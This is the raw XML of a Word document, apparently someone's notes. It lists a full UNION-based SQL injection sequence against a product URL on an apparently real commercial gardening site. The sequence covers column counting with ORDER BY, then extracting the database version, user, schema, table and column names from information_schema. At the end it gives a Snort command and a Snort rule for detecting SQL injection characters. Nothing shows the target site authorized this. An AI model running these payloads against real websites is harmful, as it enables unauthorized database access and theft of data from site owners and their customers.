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216" w:rsidRDefault="00E04216">
      <w:r w:rsidRPr="00E04216">
        <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00B52BC5">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00E04216" w:rsidP="00B52BC5">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="00B52BC5" w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B52BC5">
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00E04216" w:rsidP="00B52BC5">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="00B52BC5" w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B52BC5">
        <w:t xml:space="preserve"> order by 1--</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00E04216" w:rsidP="00B52BC5">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidR="00B52BC5" w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B52BC5">
        <w:t xml:space="preserve"> order by 2--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00E04216" w:rsidP="00B52BC5">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00B52BC5" w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B52BC5">
        <w:t xml:space="preserve"> order by 35--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B52BC5" w:rsidRDefault="00E04216" w:rsidP="00B52BC5">
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00B52BC5" w:rsidRPr="00293E52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B52BC5">
        <w:t xml:space="preserve"> order by 36--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00E04216" w:rsidP="00AE1994">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00AE1994" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE1994">
        <w:t xml:space="preserve"> union select 1,2</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994" w:rsidRPr="00AB6DAE">
        <w:t>,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00E04216" w:rsidP="00AE1994">
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00AE1994" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE1994">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE1994">
        <w:t>1,@</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE1994">
        <w:t>@version</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994" w:rsidRPr="00AB6DAE">
        <w:t>,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A78CE" w:rsidRDefault="00E04216">
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00AB6DAE" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB6DAE">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AB6DAE">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00AB6DAE" w:rsidRPr="00AB6DAE">
        <w:t>,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AB6DAE" w:rsidRPr="00AB6DAE">
        <w:t>_concat(schema_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D505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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D505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information_schema.schemata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D505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--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00E04216" w:rsidP="00AE1994">
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00AE1994" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE1994">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE1994">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994">
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE1994">
        <w:t>(database()</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994" w:rsidRPr="00AB6DAE">
        <w:t>),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00E04216" w:rsidP="00AE1994">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00AE1994" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE1994">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE1994">
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE1994">
        <w:t>_concat(user()</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994" w:rsidRPr="00AB6DAE">
        <w:t>),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t>--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00E04216" w:rsidP="00AE199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hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00AE1994" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AE1994">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00AE1994">
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00AE1994">
        <w:t>_concat(</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t>table</w:t>
      </w:r>
      <w:r w:rsidR="00AE1994" w:rsidRPr="00AB6DAE">
        <w:t>_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D505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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D505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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D505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where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D505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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D505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=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D5056" w:rsidRDefault="00E04216" w:rsidP="003D505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hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="003D5056" w:rsidRPr="00970DE8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.nichegardens.com/catalog/item.php?id=-1911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003D5056">
        <w:t xml:space="preserve"> union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003D5056">
        <w:t>1,group</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003D5056">
        <w:t>_concat(</w:t>
      </w:r>
      <w:r w:rsidR="002C6EEF">
        <w:t>column</w:t>
      </w:r>
      <w:r w:rsidR="003D5056" w:rsidRPr="00AB6DAE">
        <w:t>_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35</w:t>
      </w:r>
      <w:r w:rsidR="003D5056">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D505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from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D505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information_schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D505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where </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003D505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table_schema</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003D505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=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00AE1994"/>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994"/>
    <w:p w:rsidR="004762E1" w:rsidRDefault="006E3E9C">
      <w:r>
        <w:t>snort:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3E9C" w:rsidRDefault="006E3E9C">
      <w:r>
        <w:t>cd\snort</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3E9C" w:rsidRDefault="006E3E9C">
      <w:r>
        <w:t>cd bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E3E9C" w:rsidRDefault="006E3E9C">
      <w:r>
        <w:t>snort -I 2 -c c:\Snort\etc\snort.conf -A console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00AE1994" w:rsidRDefault="00AE1994" w:rsidP="00B8642E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</w:p>
    <w:p w:rsidR="00B8642E" w:rsidRPr="00B8642E" w:rsidRDefault="00B8642E" w:rsidP="00B8642E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8642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alert </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B8642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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B8642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$EXTERNAL_NET any -&gt; $HTTP_SERVERS $HTTP_PORTS (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B8642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msg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B8642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:"SQL Injection - Paranoid"; flow:to_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B8642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server,established</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B8642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;uricontent:".pl";pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i"; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B8642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classtype:Web-application-attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B8642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; sid:9099; rev:5;)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B8642E" w:rsidRDefault="00B8642E"/>
    <w:p w:rsidR="00B8642E" w:rsidRDefault="00B8642E"/>
    <w:sectPr w:rsidR="00B86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AE"/>
    <w:rsid w:val="00092B0D"/>
    <w:rsid w:val="002A4A59"/>
    <w:rsid w:val="002C6EEF"/>
    <w:rsid w:val="00367ADC"/>
    <w:rsid w:val="003D5056"/>
    <w:rsid w:val="004762E1"/>
    <w:rsid w:val="006E3E9C"/>
    <w:rsid w:val="008A78CE"/>
    <w:rsid w:val="00A86D3D"/>
    <w:rsid w:val="00AB6DAE"/>
    <w:rsid w:val="00AE1994"/>
    <w:rsid w:val="00B52BC5"/>
    <w:rsid w:val="00B8642E"/>
    <w:rsid w:val="00E0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2577"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5229BF4-222B-4790-8DA2-7A874BAC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DAE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64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chegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-1911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ichegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-1911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nichegardens.com/catalog/item.php?id=-191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ichegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-1911" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-1911" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-1911" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=1911" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nichegardens.com/catalog/item.php?id=-19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mandapati</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>mahesh mandapati</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-12-07T00:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-08T20:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>